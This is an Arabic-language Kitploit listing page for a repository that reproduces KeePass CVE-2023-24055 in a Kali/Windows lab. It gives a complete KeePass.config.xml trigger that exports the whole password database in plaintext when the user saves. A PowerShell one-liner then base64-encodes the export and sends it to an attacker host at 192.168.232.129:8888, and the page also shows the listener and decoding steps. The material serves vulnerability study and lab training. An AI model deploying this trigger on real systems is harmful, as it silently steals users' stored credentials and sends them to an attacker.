Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
KeePass-CVE-2023-24055 — KeePass CVE-2023-24055 إعادة إنتاج | Kitploit
أدوات/GitHubGitHub/zwlsix/keepass-cve-2023-24055
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالتسريب البياناتالتعلم والتعليممختبرات وتدريب عملي
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

KeePass CVE-2023-24055 إعادة إنتاج

عرض المستودع
12منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

KeePass-CVE-2023-24055

إعادة إنتاج KeePass CVE-2023-24055 إعادة إنتاج KeePass CVE-2023-24055

  1. تحضير الأجهزة: Kali (192.168.232.129)، Windows 10 (192.168.232.128)

  2. إصدار KeePass: 2.53

图片1

  1. المبدأ: عن طريق تعديل ملف تهيئة KeePass.config.xml، إضافة عنصر تكوين المشغل (Trigger) لتصدير كلمات المرور النصية الصريحة وتحميلها إلى خادم المهاجم؛ رمز XML لإضافة المشغل كما يلي:

حيث: حقل <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> هو المسار المحلي لتصدير كلمات المرور النصية الصريحة.

استخدم PowerShell لنقل ملف كلمة المرور باستخدام طريقة GET.

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>
  1. تعديل ملف KeePass.config.xml، إضافة عنصر تكوين XML وحفظه (مكان الإضافة: داخل علامة <TriggerSystem></TriggerSystem>)، ثم فتح KeePass للتحقق من نجاح الإضافة:

tu2

  1. افتح Kali واستخدم الأمر python3 -m http.server 8888 لبدء خدمة الويب لاستقبال كلمات المرور النصية الصريحة المصدرة.

tu3

  1. افتح KeePass، أنشئ سجلاً جديداً واحفظه، يتم تشغيل المشغل، ثم تحقق من المحتوى المستلم على Kali:

tu4

  1. انسخ المحتوى إلى ملف، وقم بفك تشفيره باستخدام base64، وستحصل على كلمات المرور النصية الصريحة.

tu5

tu6

المقالات المرجعية: https://github.com/alt3kx/CVE-2023-24055_PoC https://www.youtube.com/watch?v=tqK1bns51ek

تنزيل الأداة